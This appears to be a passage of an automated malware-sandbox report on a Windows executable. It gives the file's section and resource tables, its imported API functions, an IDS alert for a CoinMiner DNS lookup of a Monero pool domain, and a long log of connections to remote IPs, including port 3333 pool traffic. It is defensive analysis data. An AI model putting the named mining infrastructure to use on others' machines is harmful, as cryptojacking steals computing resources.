| IMAGE_DIRECTORY_ENTRY_TLS | 0x53780 | 0x28 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4b3f0 | 0x140 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x48000 | 0x508 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x588bc | 0x120 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x4676e | 0x46800 | f06bb06e02377ae8b223122e53be35c2 | False | 0.5372340425531915 | data | 6.47079645411382 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x48000 | 0x128c4 | 0x12a00 | 2de06d4a6920a6911e64ff20000ea72f | False | 0.4499003775167785 | data | 5.273999097784603 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x5b000 | 0xe75c | 0x1a00 | 0dbdb901a7d477980097e42e511a94fb | False | 0.28275240384615385 | data | 3.2571023907881185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0x6a000 | 0x306c | 0x3200 | b0ce0f057741ad2a4ef4717079fa34e9 | False | 0.483359375 | data | 5.501810413666288 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .didat | 0x6e000 | 0x360 | 0x400 | 1fcc7b1d7a02443319f8fcc2be4ca936 | False | 0.2578125 | data | 3.0459938492946015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| _RDATA | 0x6f000 | 0x15c | 0x200 | 3f331ec50f09ba861beaf955b33712d5 | False | 0.408203125 | data | 3.3356393424384843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x70000 | 0xff7c | 0x10000 | 7cc0e4178407044344713ed68f887c23 | False | 0.2468109130859375 | data | 5.044029509615392 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x80000 | 0x970 | 0xa00 | 77a9ddfc47a5650d6eebbcc823e39532 | False | 0.52421875 | data | 5.336289720085303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| PNG | 0x706a4 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | | | 1.0027729636048528 |
| PNG | 0x711ec | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | | | 0.9363390441839495 |
| RT_ICON | 0x72798 | 0x8db | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8142920158800176 |
| RT_ICON | 0x73074 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | | | 0.029168634860651865 |
| RT_ICON | 0x7729c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.047925311203319505 |
| RT_ICON | 0x79844 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 0 | | | 0.05798816568047337 |
| RT_ICON | 0x7b2ac | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.06543151969981238 |
| RT_ICON | 0x7c354 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.10327868852459017 |
| RT_ICON | 0x7ccdc | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 0 | | | 0.12732558139534883 |
| RT_ICON | 0x7d394 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.10815602836879433 |
| RT_DIALOG | 0x7d7fc | 0x2ba | data | | | 0.5286532951289399 |
| RT_DIALOG | 0x7dab8 | 0x13a | data | | | 0.6560509554140127 |
| RT_DIALOG | 0x7dbf4 | 0xf2 | data | | | 0.71900826446281 |
| RT_DIALOG | 0x7dce8 | 0x14a | data | | | 0.6 |
| RT_DIALOG | 0x7de34 | 0x314 | data | | | 0.47588832487309646 |
| RT_DIALOG | 0x7e148 | 0x24a | data | | | 0.6279863481228669 |
| RT_STRING | 0x7e394 | 0x1fc | data | | | 0.421259842519685 |
| RT_STRING | 0x7e590 | 0x246 | data | | | 0.41924398625429554 |
| RT_STRING | 0x7e7d8 | 0x1a6 | data | | | 0.514218009478673 |
| RT_STRING | 0x7e980 | 0xdc | data | | | 0.65 |
| RT_STRING | 0x7ea5c | 0x470 | data | | | 0.3873239436619718 |
| RT_STRING | 0x7eecc | 0x164 | data | | | 0.5056179775280899 |
| RT_STRING | 0x7f030 | 0x110 | data | | | 0.5772058823529411 |
| RT_STRING | 0x7f140 | 0x158 | data | | | 0.4563953488372093 |
| RT_STRING | 0x7f298 | 0xe8 | data | | | 0.5948275862068966 |
| RT_STRING | 0x7f380 | 0x1c6 | data | | | 0.5242290748898678 |
| RT_STRING | 0x7f548 | 0x268 | data | | | 0.4837662337662338 |
| RT_GROUP_ICON | 0x7f7b0 | 0x76 | data | | | 0.7457627118644068 |
| RT_MANIFEST | 0x7f828 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.3957333333333333 |

| DLL | Import |
|---|---|
| KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA |
| OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear |
| gdiplus.dll | GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 06/23/24-11:31:12.198589 | UDP | 2047928 | ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com) | 49698 | 53 | 192.168.2.4 | 1.1.1.1 |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Jun 23, 2024 11:31:14.770801067 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:14.770915985 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:14.771174908 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:14.771207094 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:15.492588043 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:15.494374037 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:15.494426966 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:15.842303038 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:15.842468023 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:15.842560053 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:15.842878103 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:16.175148964 CEST49736443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:16.175249100 CEST4434973692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:16.175340891 CEST49736443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:16.175611019 CEST49736443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:16.175643921 CEST4434973692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:16.207253933 CEST333349732141.94.96.144192.168.2.4
                                                                              Jun 23, 2024 11:31:16.250643969 CEST497323333192.168.2.4141.94.96.144
                                                                              Jun 23, 2024 11:31:16.880925894 CEST4434973692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:17.063190937 CEST49736443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:20.260010004 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:20.260045052 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:20.260135889 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:20.265114069 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:20.265130043 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.084431887 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.084530115 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.086519957 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.086529970 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.086874962 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.152177095 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.196511030 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.433937073 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.434119940 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.434195042 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.437335968 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.475305080 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.475337029 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.475410938 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.475771904 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.475786924 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.263181925 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.265476942 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.265511990 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.604455948 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.604667902 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.604861021 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.605263948 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.862143993 CEST49739443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.862229109 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.862313032 CEST49739443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.862709999 CEST49739443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.862747908 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:23.644334078 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:23.645922899 CEST49739443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:23.645986080 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:23.986260891 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:23.986330986 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:23.986402035 CEST49739443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:23.986864090 CEST49739443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:23.988023043 CEST49741443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:23.988085032 CEST4434974192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:23.988182068 CEST49741443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:23.988507032 CEST49741443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:23.988533020 CEST4434974192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:24.714535952 CEST4434974192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:24.716639042 CEST49741443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:24.716697931 CEST4434974192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:25.062024117 CEST4434974192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:25.062222004 CEST4434974192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:25.062311888 CEST49741443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:25.062732935 CEST49741443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:25.272823095 CEST49742443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:25.272907019 CEST4434974292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:25.273000002 CEST49742443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:25.273363113 CEST49742443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:25.273394108 CEST4434974292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:25.976872921 CEST4434974292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:25.978486061 CEST49742443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:25.978524923 CEST4434974292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:26.285243988 CEST333349732141.94.96.144192.168.2.4
                                                                              Jun 23, 2024 11:31:26.322613001 CEST4434974292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:26.322798967 CEST4434974292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:26.322864056 CEST49742443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:26.323514938 CEST49742443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:26.325093985 CEST49744443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:26.325206995 CEST4434974492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:26.325352907 CEST49744443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:26.325740099 CEST49744443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:26.325776100 CEST4434974492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:26.453821898 CEST497323333192.168.2.4141.94.96.144
                                                                              Jun 23, 2024 11:31:27.024298906 CEST4434974492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:27.029077053 CEST49744443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:27.029122114 CEST4434974492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:27.365695953 CEST4434974492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:27.365844011 CEST4434974492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:27.365915060 CEST49744443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:28.975908041 CEST333349732141.94.96.144192.168.2.4
                                                                              Jun 23, 2024 11:31:29.063191891 CEST497323333192.168.2.4141.94.96.144
                                                                              Jun 23, 2024 11:31:32.019682884 CEST49749443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:32.019757032 CEST4434974992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:32.019853115 CEST49749443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:32.024535894 CEST49749443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:32.024573088 CEST4434974992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:32.744692087 CEST4434974992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:32.744786024 CEST49749443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:32.750181913 CEST49749443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:32.750214100 CEST4434974992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:32.751157045 CEST4434974992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:32.924987078 CEST49749443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:33.064435005 CEST49749443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:33.104541063 CEST4434974992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:33.189086914 CEST49736443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:33.289144039 CEST4434974992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:33.289393902 CEST4434974992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:33.289488077 CEST49749443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:33.291059971 CEST49749443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:33.342456102 CEST49750443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:33.342540979 CEST4434975092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:33.342664003 CEST49750443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:33.342890978 CEST49750443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:33.342926025 CEST4434975092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:34.050586939 CEST4434975092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:34.058233976 CEST49750443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:34.058295012 CEST4434975092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:34.395102978 CEST4434975092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:34.395180941 CEST4434975092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:34.395242929 CEST49750443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:34.395674944 CEST49750443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:34.505764961 CEST49751443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:34.505810022 CEST4434975192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:34.505875111 CEST49751443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:34.506156921 CEST49751443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:34.506177902 CEST4434975192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:35.307306051 CEST4434975192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:35.317027092 CEST49751443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:35.317066908 CEST4434975192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:35.650631905 CEST4434975192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:35.650777102 CEST4434975192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:35.650851011 CEST49751443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:35.651123047 CEST49751443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:35.652131081 CEST49752443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:35.652194977 CEST4434975292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:35.652283907 CEST49752443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:35.652508974 CEST49752443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:35.652539015 CEST4434975292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:36.449484110 CEST4434975292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:36.451071024 CEST49752443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:36.451131105 CEST4434975292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:36.582230091 CEST333349732141.94.96.144192.168.2.4
                                                                              Jun 23, 2024 11:31:36.766427994 CEST497323333192.168.2.4141.94.96.144
                                                                              Jun 23, 2024 11:31:36.793217897 CEST4434975292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:36.793373108 CEST4434975292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:36.793454885 CEST49752443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:36.793741941 CEST49752443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:37.004890919 CEST49753443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:37.004995108 CEST4434975392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:37.005074024 CEST49753443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:37.005342007 CEST49753443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:37.005393028 CEST4434975392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:37.708132982 CEST4434975392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:37.712366104 CEST49753443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:37.712447882 CEST4434975392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:38.056611061 CEST4434975392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:38.056765079 CEST4434975392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:38.056843042 CEST49753443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:38.057101011 CEST49753443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:38.058118105 CEST49754443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:38.058175087 CEST4434975492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:38.058258057 CEST49754443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:38.058490992 CEST49754443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:38.058521986 CEST4434975492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:38.843358994 CEST4434975492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:38.953818083 CEST49754443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:42.691401958 CEST49744443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:43.393876076 CEST49755443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:43.393954039 CEST4434975592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:43.394046068 CEST49755443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:43.397667885 CEST49755443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:43.397702932 CEST4434975592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:44.188755989 CEST4434975592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:44.188920021 CEST49755443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:44.190712929 CEST49755443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:44.190747976 CEST4434975592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:44.191226959 CEST4434975592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:44.289782047 CEST49755443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:44.332525015 CEST4434975592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:44.527389050 CEST4434975592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:44.527887106 CEST4434975592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:44.527973890 CEST49755443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:44.534267902 CEST49755443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:44.835968971 CEST49756443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:08.357824087 CEST4434977792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:09.143457890 CEST4434977792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:09.145689964 CEST49777443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:09.145755053 CEST4434977792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:09.485675097 CEST4434977792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:09.485838890 CEST4434977792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:09.485971928 CEST49777443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:09.486356974 CEST49777443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:09.645576000 CEST49778443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:09.645657063 CEST4434977892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:09.645744085 CEST49778443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:09.645951986 CEST49778443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:09.645983934 CEST4434977892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:10.364264965 CEST4434977892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:10.365745068 CEST49778443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:10.365772963 CEST4434977892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:10.711680889 CEST4434977892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:10.711817980 CEST4434977892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:10.711889982 CEST49778443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:10.712110996 CEST49778443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:10.713022947 CEST49779443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:10.713098049 CEST4434977992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:10.713185072 CEST49779443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:10.713402033 CEST49779443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:10.713438034 CEST4434977992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:11.494493008 CEST4434977992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:11.495928049 CEST49779443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:11.495965958 CEST4434977992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:11.836424112 CEST4434977992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:11.836611032 CEST4434977992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:11.836682081 CEST49779443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:11.836916924 CEST49779443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:11.988789082 CEST49780443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:32:11.988879919 CEST4434978092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:32:11.988970995 CEST49780443192.168.2.492.53.96.121
